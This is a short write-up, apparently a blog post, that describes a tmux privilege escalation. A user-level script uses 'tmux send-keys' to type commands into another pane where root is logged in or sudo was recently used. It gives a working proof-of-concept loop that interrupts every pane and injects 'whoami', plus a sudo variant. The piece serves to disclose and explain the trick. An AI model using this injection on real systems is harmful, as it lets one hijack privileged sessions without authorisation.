tmux privilege escalation abusing send-keys

A script run as user in tmux can under some circumstances execute commands as root.

tl;dr

Did you know you can send keystrokes to other panes in tmux?

You can abuse send-keys to send commands to a root/sudo pane.

That's all there is to it, that's the trick.

send-keys

There's a tmux feature to send keystrokes to a pane.

tmux send-keys -t $pane 'C-c' for example sends SIGINT to whatever is running in pane $pane.

man tmux

When I sae the send-keys feature, I was like:

"What if theres another pane, where the user is logged in as root?"

poc||gtfo

preparations

tmux tmux sp su # login as root

Now go back to the other tmux pane (where you are logged in as user).

action

Now run the following script, to execute whoami in every pane:

#!/bin/sh for pane in `tmux list-panes | grep -Po '^\d'`; do tmux send-keys -t $pane 'C-c' tmux send-keys -t $pane 'whoami '; done;

You will see, as expected, the command whoami returned root.

sudo

With the same trick you can abuse that sudo was used in another pane.

tmux send-keys -t $pane 'sudo whoami ';

. . /